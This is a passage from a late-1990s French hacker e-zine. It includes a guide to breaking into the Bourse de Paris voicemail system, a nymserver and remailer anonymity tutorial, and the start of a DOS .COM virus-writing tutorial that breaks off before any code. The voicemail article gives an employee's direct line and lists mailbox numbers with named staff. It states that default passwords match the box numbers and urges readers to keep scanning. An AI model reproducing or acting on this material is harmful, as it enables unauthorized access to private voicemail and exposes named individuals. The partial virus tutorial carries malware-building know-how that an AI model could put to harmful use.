(punition N°1) et de faire le tour du paté de maison sur un seul pied
(punition N°2) A part ça tout va a peu pres bien, je te souhaite un tres bon
weekend et à Lundi. Tu auras beau temps car j'ai vu Claude perché sur le
rebord interieur de sa fenêtre et c'est toujours signe de beau temps! Je
plaisante voyons ne t'en fais pas tu auras beau temps quand meme/
Rigolo
***************************************************************************
He oui FT aussi a ses rigolos :-) Derniere petite info à propos des PM2
(cité dans le zine numero 2) apres collecte d'information c'est un systeme
d'affectation des ressources de transmission (numérique) cad qu'il contient
tous les blocs et toutes les sections numériques des réseaux primraires et
secondaires. Il communique journallement avec Madras qui est une base de
travail (routage, materiel ...). Le logiciel de gestion est ecrit en MANTIS
et tourne sous des DPS 7000
(ordi BULL http://www.eis.bull.com/gcos7f/products/list1.htm)
Voili voila pour ce numéro je compte sur vos contributions qui en matiere
de TRASH son inexistante. Un ptit coucou aux poubelles de FT, et au gardien
qui bigle dessus avec ses cameras de video surveillance.
Aaah
Aaah@mail.dotcom.fr
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) VMB Bourse de paris ( 4.9 ) Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Toutes les grosses boites, ou institutions n'ont pas des N° vert néamoins
elles ont toujours des systemes VMB. La bourse de paris en fait partie,
je vais sur leur site web, rubrique SBF -> contacts et la je trouve quelques
Numeros de ligne direct. Ces numéros ont des répondeurs gérés par une PABX
alcatel 4400. Il est inquietant de constater que de si grande institution
telle que la bourse de paris ou bien encore COFIDIS (il y a qque mois) laisse
leur systeme de messagerie aussi ouvert ...
Methode utilisée
http://www.bourse-de-paris.fr/fr/sbf6/ti631.htm :
Marie Claude GRUSSEN-MARKUSFELD
Responsable departement diffusion
Tel: 01.49.27.11.07
Employée model des qu'elle quitte le bureau elle active son répondeur. Il
décroche et lance le message d'acceuil. La vous tapez sur #. Vous tombez
dans le menu général de la VMB. Encore # et vous pouvez en tatonant trouver
plusieurs postes. J'en ai scanné une partie :
* sauf exception le mot de passe par default est celui de la N° de BAL *
1108 -> Michel Dumon
1129 -> Sandrine Charagnac
1136 -> Quelqu'un
1172 -> Hilary Simon
1179 -> Jean Siamanguy
1183 -> Anick Provot
1195 -> Marie christine Lafrange * Mot de passe *
1198 -> Bernard Ruclo * Mot de passe*
Quelques BAL vides :
1100 1114 1116 1116 1119 1121 1123 1124 1125 1127
1129 1120 1132 1133 1134 1163 1153 1142 1141 1166
1213 -> Quelqu'un * Mot de passe *
1217 -> Gabriel Samantin * Mot de passe *
1221 -> Yves Lephilippe
1223 -> Jean charles Drugeon
1228 -> Pascal Riva * Mot de passe *
1232 -> François oreau
1237 -> Antoine Blanchard
1244 -> Christine Canau
1258 -> Romain Devet
1259 -> Quelqu'un
1269 -> Philippe Martinez
1267 -> Menin Cheymoue
1270 -> Corine Barron * Mot de passe *
1281 -> Joel Zetoune * Mot de passe *
1285 -> Emmanuel Colard
1286 -> Antony Atia
1204 -> Vincent Gaffo
1205 -> Mr Debecker
1208 -> Richard Masoto
Quelques BAL vides :
1225 1226 1229 1233 1236 1269 1242 1247 1243 1257
1261 1279 1274 1278 1282 1296 1202 1209
En vrac avec des identités plus précises :
1515 -> Pierre Myo
1638 -> Marianne HUVE-ALLARD
Directrice de la Promotion du marché actions
1606 -> Yanncik PETIT
Directeur général adjoint du Nouveau Marché
1586 -> Martine CHARBONNIER
Directrice des Emetteurs et de la cote
1336 -> Eve CARPENTIER
Chef du Service Bureau d'Analyse Financiere
1358 -> Xavier LEROY
Prospection et suivi commercial des membres Direction des Affaires
Juridiques et des Relations avec les Intervenants de Marché
1108 -> Michel DUMONT
Gestion Administrative des Membres Direction des Affaires Juridiques
et des relations avec les Intervenants du Marché
Le scan n'est pas complet vous pouvez le continuer dans les limites suivantes:
1XXX ; 513X ; 50XX Les X symbolisant la suite de 10 chiffres à tester. Si des
gens se reconnaissent dans les noms désolé pour l'orthographe j'ai ecrit à
la phonétique :-)
Aaah (micalement)
Aaah@mail.dotcom.fr
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) NYMSERVERS ( 4.10 ) Drahiin (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
LES NYMSERVERS
Communiquez par mail de facon (pratiquement) intracable.
Par Drahiin.
Cet article présente l'utilisation des nymservers.
Il existe déjà de la documentation sur le sujet, mais elle n'est en général
pas très claires, et manque souvent d'exemples. Ici nous aborderons le
domaine de la sécurité, et de la mise en pratique.
Les nym-servers fonctionnent de façon à obtenir une adresse mail qui masque
totalement votre identité. Il s'agit d'une adresse qui permet l'émission et
la réception de mail, de façon anonyme. Le procédé inclus l'utilisation de
PGP, ce qui contribue à en améliorer la securité.
Lors de l'échange de mails, le problème de sécurité posé se trouve
généralement lors du transport des données, ou dans la confiance faite aux
serveurs. Pour le premier point, l'utilisation systématique de PGP permet
de palier à ce problème. Si vos clefs font dans les 2048 bits voir plus,
autant dire que vous êtes tranquille (pour le moment). Pour le cas de la
confiance aux serveurs, nous verrons que les nym-servers peuvent être
utilisés sans nécessiter le stockage d'informations sensibles.
*
CHAP I - Pourquoi utiliser les nymserver ?
1) Le problème des mailbox gratuites.
De nombreuses boites au lettres gratuites existent sur le net (hotmail,
yahoo, caramail, excite...). Cependant ces sites conservent les IP, les
destinataires et les dates d'envoi dans les logs.
De plus quand un message est posté sur un server SMTP, l'IP est inscrite
dans le mail. L'adresse IP de l'expediteur est contenue dans le header du
mail, champ Received. Voici quelques exemples rapides.
Exemple sur le serveur SMTP de Club-Internet (c'est aussi valable chez
Easynet et d'autres...) Voila ce qu'on trouve dans le header:
Received: from xxxxx (ppp-195-36-198-45.pop.club-internet.fr
[195.36.198.45])
by front2.grolier.fr (8.9.0/8.9.2) with SMTP id xxxxxxxx
for <xxxxxxx@xxxxxx.xxx>; Sat, xx Feb 1999 xx:xx:xx +0100 (MET)
un petit nslookup sur 195.36.198.45 nous donne Cergy-2-45.club-internet.fr
.
Idem avec wanadoo:
Received: from tntorl12-117.abo.wanadoo.fr [164.138.14.117] by wanadoo.fr
Paris Fri, xx Feb 1999 xx:xx:xx +0100 (MET)
Penons maintenant l'exemple de mails ecrits directement sur le web, ils
sont envoyés a partir d'un formulaire:
Received: from web4.rocketmail.com (205.180.57.78)
by anon.efga.org with SMTP; xx Feb 1999 xx:xx:xx -0000
Received: from [212.198.34.60] by web4; Mon, xx Feb 1999 xx:xx:xx PST
Un nslookup renvoit: d060.paris-34.cybercable.fr
Avec hotmail maintenant:
Received: from unknown (HELO hotmail.com) (209.185.131.109)
by host096.a-272.99.66.209.in-addr.arpa with SMTP; xx Feb 1999 xx:xx:xx
-0000
Ici le nslookup ne nous renseigne pas beaucoup: law-f46.hotmail.com
Mais il suffit de regarder un peu plus loin:
Received: from 195.238.22.42 by www.hotmail.com with HTTP;
Thu, xx Feb 1999 xx:xx:xx PST
X-Originating-IP: [195.238.22.42]
Encore un nslookup: dialup810.brussels.skynet.be c'est bien un isp.
Effectivement hotmail nous facilite la tache, il y'a un champ qui contient
directement l'ip (utilisable facilement pour generer des bases de donnees
:-/
Bon finalement il est très facile de retrouver l'ip d'une personne à partir
d'un mail.
2) Les remailers anonymes.
Lors de l'utilisation de remailers anonymes, le mail est envoyé sous forme
encapsulée au remailer. Celui ci enleve le header et envoie le contenu au
destinataire. Il est évidement possible d'enchainer plusieurs remailers,
situés dans des pays differents, si possible. Le problème, c'est tellement
anonyme que personne ne peut vous repondre.
Les remailers ont tout de même leur utilité pour l'envoi à sens unique de
messages, et on s'en sert dans l'utilisation des nym-servers. (C'est
pourquoi leur fonctionement sera brièvement decrit dans cet article.)
3) Le mail forgery.
Tout le monde connait ça, c'est le fameux telnet sur le port 25. Toutefois,
il est tres facile de se faire repérer si on s'y prend mal. C'est loin
d'être pratique, et persone ne peut vous repondre (si c'est bien utilisé).
Le but est l'utilisation de fausse identité, ce domaine n'est pas couvert
dans cet article. Pour les mails anonymes, préférez les remailers.
4) Les nymservers.
Ils constituent une solution efficace, notament grace à l'emploi du
cryptage sur tout le parcourt du mail, entre l'utilisateur et le serveur
(cela évite le sniffing des données). De plus, l'utilisation de remailers
évite d'être tracé, à partir du server comme à partir du remailer.
Le principal défaut est la complexite d'utilisation au début. De plus, le
nombre de cryptages/decryptages pour envoyer et recevoir du courier peut
devenir fastidieux. Les données stoquées sur le serveur constiuent la seule
zone critique de securité. Mais nous verons qu'il existe une solution à
cela (par les newsgroups). Le seul domaine critique qui subsiste
finalement, est la façon dont les données sont stoquees sur votre disque
dur. ;)
*
CHAP II - Principe de fonctionnement.
(Si seul le cote pratique vous interesse, passez au chapitre suivant.)
En gros, un nym-server propose une adresse mail sur un serveur, qui sert
d'intermedaire entre l'utilisateur et les gens avec qui il communique. Par
exemple, il faut choisir un alias du genre pseudo@the.nym.server, vous
envoyez vos mails au serveur et ils seront envoyés à la bonne personne avec
pseudo@the.nym.server dans le champ FROM. (normal quoi ;)
De même, tous les mail destine à pseudo@the.nym.server vous seront
renvoyés.
On crypte le message pour le serveur et on l'envoie via une chaine de
remailers, en cryptant avec une clef différente pour chaque remailer. Cela
évite le tracage et donc le repérage de votre IP.
Ainsi seul le premier remailer (remailer 1) connait votre IP, il connait
également l'adresse du remailer suivant (remailer 2), mais pas plus, car le
contenu est crypté pour le remailer 2.
Le remailer 2 recoit le message du remailer 1 mais ne sait pas ce qui s'est
passé avant. Il le décripte avec sa clef, et sait qu'il doit l'envoyer au
remailer 3... et ainsi de suite.
En fait le dernier remailer, décrypte le contenu avec sa clef, et l'envoit
au nym-server. Celui décrypte le contenu et peut finalement delivrer le
message à la personne.
En resumé, chaque machine sur le trajet voit uniquement la machine
précédente et suivante. Elle ne peut pas savoir ce qui se passe plus loin.
A part au début, on ne peut même pas savoir d'ou provient le message, on
sait seulement qu'il provient d'un remailer. Et justement, au début on ne
peut pas connaitre sa destination finale, il part seulement vers le premier
remailer de la chaine.
(Ca vous protège si un certain 'root' surveille vos mails, ou si quelqu'un
est en train de sniffer le port 25 (c'est pas bon pour la santé ;)
Pendant tout le trajet le contenu est donc crypté. Ainsi même intercepté
n'importe où sur le net, votre mail reste anonyme. Quand vous recevez des
mails à votre adresse nym, il vous sont renvoyés par des remailers suivant
le même procédé. Vous pouvez donc envoyer et recevoir des mails sous cet
alias sans pour autant etre identifié.
Voilà, le server n'a pas votre adresse IP, donc vous etez intracable. (A
condition de pouvoir faire confiance à au moins un remailer dans la chaîne,
de façon à ce que celle-ci ne puisse etre remontée. Si les remailers sont
repartis un peu partout dans le monde, cela améliore encore la securité.)
Mais le probleme, c'est que le server nym possède l'adresse mail que vous
lui avez fournie, c'est l'endroit ou il renvoit les mail a travers des
remailers. Donc si on ne fait pas confiance au nym-server, et dans le cas
ou celui-ci serait demantelé, il est possible de decouvrir à quelle adresse
mail correspond un alias. Pour palier à ce problème, les nym-servers
peuvent éventuellement poster vos mails dans un newsgroup (sous forme
cryptée bien sur). Là, vous pourrez les lire avec une de vos clefs privées,
resevée à cet usage. Le serveur ne possède alors plus aucune information
sur vous.
Dans ce dernier cas (un peu lourd à utiliser, quand même), le seul moyen
pour vous répérer est de reussir à recupérer la clef publique de votre
alias, stoquée sur le nym-server, puis de la comparer avec la clef privée
qui se trouve sur votre disque dur, en supposant qu'on vous soupsonne
d'etre la personne en question. Finalement, on est jamais rellement
intracable, mais il faut admettre que les chance de se faire repérer
diminuent largement.
Finalement, qu'on utilise une adresse mail ou les newsgroups pour recevoir
son courrier en provenance d'un nym-sever, il faut reconnaitre que les
risques d'identification sont largement réduits par rapport à l'utilisation
de mailbox classiques.
*
CHAP III - Mise en pratique
En fait, les nym-servers ne sont pas beaucoup utilisés, surement à cause du
nombre d'operations à effectuer pour pouvoir envoyer un mail. Mais bon,
celà vaut quand même le coup si vous transmettez des informations
sensibles.
Il y'a des softs qui evitent de tout faire à la main, mais pour ce que j'ai
pu en voir, ils sont loin d'être pratique, il y a toujours quelque chose
qui ne fonctionne pas.
Pour l'utilisation de nym-servers, il nous faut:
* - Une connection au net pour envoyer et recevoir des mails.
* - Une adresse mail, ou un lecteur de newsgroups (selon l'endroit où
seront forwardés vos mails reçus).
* - PGP.
A) Outil de base : PGP
Cet outil étant connu de tous, je ne m'étendrai pas sur le sujet. (D'autant
que je ne tiens pas non plus à recopier la doc.) Cependant, voici quelques
précisions, de façon à clarifier les choses (c'est vrai, on entend de tout
dans les channels irc ;)
Pour les versions inferieures à 5.0, PGP utilise l'algorithme RSA pour
l'échange de clefs, MD5 pour les signatures, et IDEA pour les messages et
fichiers à crypter. (Les versions 5.0 et plus rajoutent l'algo de
Diffie-Hellman pour l'échange des clefs, RIPEMD-160 et SHA-1 pour les
signatures, 3DES et CAST pour les messages et fichiers.)
Certains pensent que PGP n'est pas fiable à cause de l'evennement suivant,
répercuté un peu partout (Wired, rsa-labs, les journaux...) : Le 19 janvier
1999, l'Electronic Frontier Foundation a remporté le RSA DES Challenge III
en déchiffrant en 22 heures et 15 minutes un message crypté en DES (clé de
56 bits), celà grace à leur supercomputer "Deep Crack" ($ 250.000), en
reseau avec 100.000 autres ordinateurs sur le net. Evidement, ça n'a rien à
voir avec pgp.
L'algo DES n'est pas utilisé dans PGP (comme vous pouvez le voir au
dessus), et PGP utilise des clefs de taille bien supérieure à 56 bit (même
si on ne peut pas vraiment comparer des clefs de cryptage symetrique et
asymetrique). Pour PGP, l'algo IDEA est immunisé contre les analyse
differentielles et linéaires, et il n'y a pas de faiblesse algorithmique
connue, selon rsa-labs. En fait il y'a plus de 10^38 clef possibles, ce qui
empèche une attaque par brute-force cracking pendant pas mal d'années a
venir. Même avec des milliers de processeurs, il faudrait plusieurs fois
l'age de l'univers (c'est une moyenne, bien sur ;)
Pour ce qui est de casser le code RSA, cela nécessite une factorisation de
grands nombres en facteurs premiers. On estime qu'il est actuellement
possible de factoriser des nombres d'à peu pres 130 chiffres en utilisant
plusieurs dizaines d'ordinateurs en clustering. Cette limite augmente sans
cesse, mais necessite du materiel conséquent. Il faut rapeler qu'une clef
RSA de 512 bits fait environ 155 chiffres, donc on en est pas si loin. En
fait, il faut considerer que, quand les processeurs augmentent en
puissance, la taille des clefs augmente aussi. Prenez donc toujours la clef
la plus elevée disponible, sur votre version PGP. Mais attentions certaines
versions anciennes n'acceptent des clefs que jusqu'à 2048 bits et ne
peuvent lire les clefs plus elevées. D'autres montent actuellement jusqu'a
8192 bits.
Dans la pratique, il y a d'autres moyens pour cracker un code crypté avec
pgp. Mais ils necessitent d'avoir acces à la machine où est stoquée la clef
privée, et sont plutot liees au hacking (keyloggers, Tempest, capture dans
la mémoire ou le cache disk, packet sniffing, chevaux de troie, réecriture
du code PGP...) Si vous voulez plus d'info, allez faire un tour sur
www.rsa.com.
Bon, au debut on se demande toujours quelle version utiliser. il faut
savoir que la version la plus courrament utilisée pour le cryptage est la
version 2.6.3ia, avec des clefs de 2048 bit. (Je ne parle pas des gens qui
downloadent la dernière version pour crypter 2 mails dans leur vie.)
Note à propos des versions 5.0+ :
Ces versions implémentent de nouveaux algo de cryptage, ceux ci sont
configurés par defaut. Donc si vous ne modifiez pas votre configuration,
les clefs de type DSL, et le cryptage de données CAST seront utilisés. Le
problème c'est que les personnes qui ont des versions inferieures à 5.0 ne
pourront pas décrypter vos messages ni même utiliser vos clefs. Dans ce cas
selectionnez IDEA comme cryptage par défaut, et générez des clefs de type
RSA (de toute façon, c'est essentiel pour l'utilisation de remailers et de
nym-servers). De même, ces versions peuvent générer des clefs de taille
allant jusqu'a 4096 bits voir plus. Si vous vous limitez à 2048 bits, vos
clefs pourront être lues partout.
Sous Windoze, ces versions utilisent une interface graphique, et ne
permettent pas l'utilisation en lignes de commande (si je fais erreur,
mailez moi). C'est domage pour les script. De plus tous les exemples
fournis dans cet article utilisent les lignes de commandes. Donc changez
d'OS (installez linux par exemple.. 8-) ou alors utilisez la version
2.6.3ia. Ou cas ou vous persisteriez dans l'utilisation de l'interface
graphique, n'oubliez pas de selectionner "text output", si vos données
doivent transiter par mail, comme c'est le cas pour les remailers et
nym-servers.
Inutile de rappeler que l'utilisation de pgp est interdite en France... de
même que dans quelques autre pays: Iran, Irak, Russie et Singapore. Que des
pays democratiques, en somme... ;( Enfin, il parrait que des modifications
legislatives sont prevues, mais j'attends de voir.
Bon c'est tout pour pgp, mais relisez votre doc, ça va servir pour la
suite...
B) Un autre outil nécessaire : les remailers
Pour envoyer un mail anonyme:
1) choisir un remailer.
Une liste de remailers est disponible à l'adresse
http://anon.efga.org/~rlist/rlist.html
Le remailer doit comporter les attributs suivants cpunk, pgp, ek.
Pour une utilisation unique, choisir celui qui a le temps de latence le
plus court. Si c'est pour un usage régulier (dans un script par exemple),
il est conseillé de prendre celui qui a le 'uptime' le plus élevé.
Une fois celui-ci choisi, il faut inserer sa clef pgp (celle du remailer)
dans votre public ring. Les clefs sont dans le fichier
http://anon.efga.org/~rlist/pubring.asc. Ca vous permet d'insérer en une
seule fois les clefs de tous les remailers (avec la commande PGP -ka
pubring.asc).
Attention, il arrive que l'état des remailers change. Certains sont down
pendant un moment, et parfois de nouveaux servers sont installés. Si au
cours de l'utilisation vous constatez une erreur dans le transfert de vos
mails (ceux-ci n'arrivent plus), n'hésitez pas à aller revérifier la liste.
Les adresses de remailers utilisées ci-dessous sont valides au moment de
l'écriture de cet article.
2) envoyer un message
Avant le corps du message, rajoutez:
:: Anon-To: someone@somewhere.org
Puis envoyez le mail au remailer. (Pas à la personne ! ;)
Par exemple je tape:
::
Anon-To: Aaah@cryptel.org
Ca va ?
et j'envoie a remailer@replay.com (par exemple) simple, non ?
3) chainer 2 remailers
exemple:
::
Anon-To: gretchen@neuropa.net
::
Anon-To: va2@cryptel.org,junk@cryptel.org,squal@cryptel.org
Quoi de neuf ?
et j'envoie à remailer@replay.com.
Il le postera à gretchen@neurapa.net, qui l'envera aux destinataires. A
chaque étape, le header du mail reçu est supprimé.
4) cryptage
Là, le mail transite en clair, et par exemple replay peut savoir quel est
le destinataire, meme si le mail passe par neuropa. C'est un problème si le
mail passe par une partie sniffée du réseau.
Donc dans mon_mail.txt j'écris
::
Anon-To: team@cryptel.org
Ca va ?
puis je tape : pgp -eat mon_mail.txt remail@replay.org
En supposant que PGP est bien configuré, et que j'ai bien rajouté les clefs
des remailers (voir début du paragraphe sur les remailers), ca me génère un
ficher mon_mail.asc avec des caracteres tout bizarres ;)
ensuite j'envoye un mail dans lequel j'insert le fichier mon_mail.asc :
::
Encrypted: PGP
-----BEGIN PGP MESSAGE-----
JGHBNI76TBJHG897BOKJ
7896B9879876BV987098...
....
-----END PGP MESSAGE-----
et je poste le tout à remailer@replay.com
On peut répéter l'opération pour que le mail passe par plusieurs remailers.
C) Nymservers (enfin ;)
Regardons le cas où les messages sont renvoyés sur une adresse mail. (Nous
verrons ensuite le fonctionnnement avec les newsgroups).
1) Configuration
La première chose à faire est d'envoyer un mail de creation de compte sur
un nym-server. Il faut pour cela créer le reply block. C'est un bloc que le
serveur met en entête de tous les mail qu'il vous renvoit. Cela permet de
faire passer les messages de réponse par une chaîne de remailers.
a) Créons un fichier rblock.txt qui contient les lignes suivantes (modifiez
selon votre goût)
::
Anon-To: votre@adresse.reelle
Latent-Time: +0:00
Encrypt-Key: mot_de_passe_1
Encryptons pour le remailer gretchen avec la commande PGP -eat rblock.txt
gretchen
Nous obtenons le fichier rblock.asc. Renomez le en rblock2.txt.
b) Au début du fichier rblock2.txt on rajoute quelques lignes de facon a
obtenir ceci:
::
Anon-To: gretchen@neuropa.net
Latent-Time: +0:00
Encrypt-Key: mot_de_passe_2
:: Encrypted: PGP
-----BEGIN PGP MESSAGE-----
Version: 2.63uin
037lk7MQZ+Kkv4cptKBQGzxGsZG92UognjQaz7QB80xCivmawqOT0Iujk
zg8pKfDoARZXXjdaUnZ8Z6kg8Ttkwx0eKFH0nDgR7ZF4xKZ46+jaJgG+Z
nJcP/0p zuYbG26hhThLfOh4jEOsrStv8QKMMkp1Aa+GF1S7PTpPpRcRR
QvBAQHR6VaRq9z cOJqSdJA4TOrjsOz1GyyyNwnfTntQLwApn6ctNpVu+
2kOSHdJ9XsbSnbruIuxoyK vYnAP6ipQ3Uoj3K7AOrO2QYokcVYIiDTbe
EgzkAxy9qC3ajR3NK1vIJRHsNanQchoxNimkR1RPio/nSgxMMgInakhEN
O98ArYR3E43ErRRpbhpJyqT/i/IVGkFcP
-----END PGP MESSAGE-----
Encryptons cette fois ci pour remailer@replay.com avec la commande PGP -eat
rblock.txt remailer@replay.com
Nous obtenons un fichier rblock.asc. Renomez le en rblock3.txt.
C'est le reply block.
c) Maintenant il vous faut extraire votre clé publique perso, (il est
recommandé de reserver un set de clefs publique/privée uniquement pour
l'utilisation de votre nym server. Cela évite la comparaison avec votre
clef publique habituelle si le mail est intercepté).
Extraction de la clef publique: PGP -kxa
Sauvegardez la dans le fichier pubkey.txt pour la suite.
d) Creation du fichier de config: dans un fichier config.txt inserez les
lignes suivantes:
Config:
From: votre_pseudo
Nym-Commands: create +acksend +signsend
Public-Key:
<insérez ici le fichier config.txt>
Reply-Block:
::
Anon-To: remailer@replay.com
Latent-Time: +0:00
Encrypt-Key: mot_de_passe_3
::
Encrypted: PGP
<inserer ici le fichier rblock3.txt>
**
Ca doit vous donner quelque chose comme ca:
Config:
From: votre_pseudo
Nym-Commands: create +acksend +signsend
Public-Key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.63uin
mQCNAzGf6A8AAAEEAPknqWEUA8U4+l5TFkD5Fj0COten6bbIe5bBb/1MvI+w6mFl
z06CPb2K/Z1fzjT48ZyxwYR+S3jU3Z96JEFRl99HYh3lTIUiBHW/XtwyefF0y61x
qYkNuUpSFh9BDBFM7N3uVvaNbzLiFnqCpZLm5ZIfrLcla3qUgkTBtHVi58fRAAUR
tDhsY3MgbWl4bWFzdGVyIGFkbWluaXN0cmF0b3IgPG1peC1hZG1pbkBhbm9uLmxj
cy5taXQuZWRxPokAlQMFEDGf6ClEwbR1YufH0QEBX60D/jZ5MFRFIFA1VxTPD5Zj
qYkNuUpSFh9BDBFM7N3uVvaNbzLiFnqCpZLm5ZIfrLcla3qUgkTBtHVi58fRAAUR
tDhsY3MgbWl4bWFzdGVyIGFkbWluaXN0cmF0b3IgPG1peC1hZG1pbkBhbm9uLmxj
cy5taXQuZWRxPokAlQMFEDGf6ClEwbR1YufH0QEBX60D/jZ5MFRFIFA1VxTPD5Zj
Xw2bvqJqFvlwLD5SSHCVfe/ka6ALuxZGFKD/pHpUAkfv1hWqAYsJpi0cf8HSdi23
bh5dUeLJnHHHDmd9d55MuNYI6WTi+2YoaiJOZT3C70oOuzVXuELZ+nZwV20yxe8y
4M3b0Xjt9kq2upbCNuHZmQP+ =jIEc
-----END PGP PUBLIC KEY BLOCK-----
Reply-Block:
::
Anon-To: remailer@replay.com
Latent-Time: +0:00
Encrypt-Key: mot_de_passe_3
::
Encrypted: PGP
-----BEGIN PGP MESSAGE-----
Version: 2.63uin
hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
/S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw== =Bla3
-----END PGP MESSAGE-----
**
Attention!! Ne pas oublier les 2 astérisques finales, c'est a partir de cet
endroit que le serveur commencera le cryptage du contenu du courier
renvoyé.
Envoyez ce message à (l'aide de remailers) à l'adresse de configuration du
nymserver (par exemple config@redneck.efga.org dans le cas de
redneck.efga.org).
Vous recevrez alors un message vous demendant confirmation pour la creation
du pseudonyme. Pour lire ce message, vous devrez le décripter en entrant
les mots de passe utilisés dans le reply block.
Une fois decrypté, vous devez y répondre (peu importe le contenu de la
réponse) pour confirmer la création. Eventuellement, faites passer ce mail
de réponse par des remailers.
Vous recevrez un deuxième mail vous informant que le compte est crée.
2) Utilisation
Dans le cas d'utilisation général, quand vous recevez du courier, vous
devez le décrypter en utilisant les mots de passe du reply block, puis le
mot de passe de votre clef pgp.
Pour envoyer un mail, créez le fichier suivant :
From: pseudonyme
To: destinataire@email.net
Subject: le sujet
<ligne vide ici !!!>
Salut, ca va...
vous devrez le crypter pour le server, en le signant avec votre clef : pgp
-seat mail.txt send@redneck.efga.org -u mon_pseudo
puis envoyez le à send@redneck.efga.org, dans cet exemple.
3) Recevoir ses mails dans un newsgroup
Pour recevoir son courrier dans un newsgroup, au lieu d'une mailbox, il
suffit de creer le fichier
::
Anon-To: mail2news@anon.lcs.mit.edu
Encrypt-Key: mot_de_passe_1
##
Newsgroups: alt.anonymous.messages
Subject: sujet facile a reconnaitre
Ce fichier remplace celui créé lors du CHAP III C) 1) a) de ce texte.
Finalement, il faut reconnaître que l'emploi des nym-servers est
fastidieux, mais très sécurisé. Répartissez les remailers des pays où les
contacts avec la france sont difficiles. Essayez de trouver un nym-server
où les autorites peuvent difficilement controler ce qui s'y passe (par
exemple il existe un nym-server en Pologne).
Il peut être pratique d'automatiser le decryptage, à l'aide de scripts
shell, pour la reception des mails. Celà sous-entend que vous effaciez où
recryptiez ensuite vos mails, s'ils contiennent des informations sensibles.
Voila, si vous etes encore là, bon courage pour l'installation, c'est le
plus fastidieux. Ensuite une fois l'habitude prise, l'utilisation finit par
passer inaperçue... et celà vaut vraiment le coup si on tient à son
anonymat.
Drahiin.
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Gentil Virus ( 4.11 ) Anonyme (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
intro
~~~~~
okay bon y est... entrons dans ce monde tres marrant ke sont les virus.
cet article est dedie a ceux ki ont peur des virus et a ceux ki veulent
en apprendre plus. les autres vous pouvez sauter l'article :)
J'estime ke vous avez deja d bases en coding asm, m^me si j'explikerai bien.
Sinon je vous conseille de recup des tutoriaux de programmation assembleur.
Je tiens d'abord a dire ke faire des virus destructeurs est vraiment nul,
ke tout le monde peut le faire, et ke pour detruire il suffit d'un trojan.
Autant concentrer ses efforts a rajouter des fonctionnalites.
Comme je pense que vous n'etes po tous coder certifies, rassurez vous,
j'essayerai de pas vous perdre en route, mais une connaissance minimale
est requise. Pour ca, etudiez des tutoriaux d'assembleur, pas de virus.
Nous n'etudirons ici ke l'infecteur de com a l'execution.
J'aurai ptet l'occazion de reecrire ds ce mag si ca plait a 'Cryptel' :)
et pourrai vous entretenir de sujets plus pointus :)
Bon ... d'abord il vous faut des outils, si vous ne les avez pas deja.
toolz:
~~~~~~
1) un compileur (TASM, pas forcement la v5, v2+ suffit)
2) un debugger (Soft Ice v2.8 fait tres bien l'affaire)
3) un hex editeur (Hiew v5+ ou l'editeur de Norton Utilities)
4) des anti virus (AVs) ! (ben ouais koa fo tester)
la je vous conseille AVP & DrWeb, tres tres bons.
oubliez mcaffee et norton AV ! pis tbav & f-prot : bof bof
5) un generateur de file a infecter ('goat').. tjs utile pour tester..
6) une liste des interruptions dos pour mieux comprendre/suivre
7) la liste commentee des instructions assembleur - au K ou
8) le luxe: VDAT par cicatrix - y'a tout sur les virus !
9) du matos, des feuilles, du tabac - ca c'est pour les nerfs
Vous trouverez les AVs (anti-virus) sur ftp.elf.stuba.sk/pub/pc/avir,
ainsi ke les goats maker (y'en a +ieurs).
Les outils se trouvent tous surement sur ma page : www.multimania.com/mdrg
bon... on va pouvoir commencer:
ok let's begin:
~~~~~~~~~~~~~~~
bon.. je vais parler ici des runtime infector appender.
(infection a l'execution, et ki se rajoute simpelmnet a la fin du .com)
Comment ne pas detruire : (ce ki est plus dur ke l'inverse)
- un .com ne peut pas depasser 64ko ! donc notre virus devras checker la
taille du host (file infected) + sa taille < 64ko
- ne pas utiliser des structures trop bizarres si on ne les connait pas
(comme les SFTs ki ne marchent pas ss win9x/NT et les reseaux novell)
- bien tester, surtout si vous rajoutez de l'anti debug ou de l'anti
heuristic (<- ou anti emul)
- tjs penser aux erreurs eventuelles ki peuvent survenir.
bon .. vous savez ce k'est un .com.. voila un shema simpliciste :
ccccccccccccccccccccccccccccc (suite d'instrutions)
notre virus devra prendre le controle avant l'execution normal du com
(c'est po oblige, mais c'est + simple, & ici suffisant pour la demo)
il devra ecrire une instruction de saut au debug du prog ki redirige vers son
propre code colle a la suite du com. et conserver l'ancien debut !
la grande parite vvvvvv est consacree a l'infection d'autre proggys.
en shema, ca donne ca:
vccccccccccccccccccccccccccccvvvvvvvvvc
^ ^ ^ ancien debut (pas forcement ici)
`. ,'
`ùÄÄ saut vers ÄÄÄÄÄÄÄ--ù'
voila pour la theorie (j'pense avoir perdu personne juske la)
dans la pratik now:
en 1er, il faut trouver une victime :)
on peut utiliser l'interruption 21h fonction 4e/4f
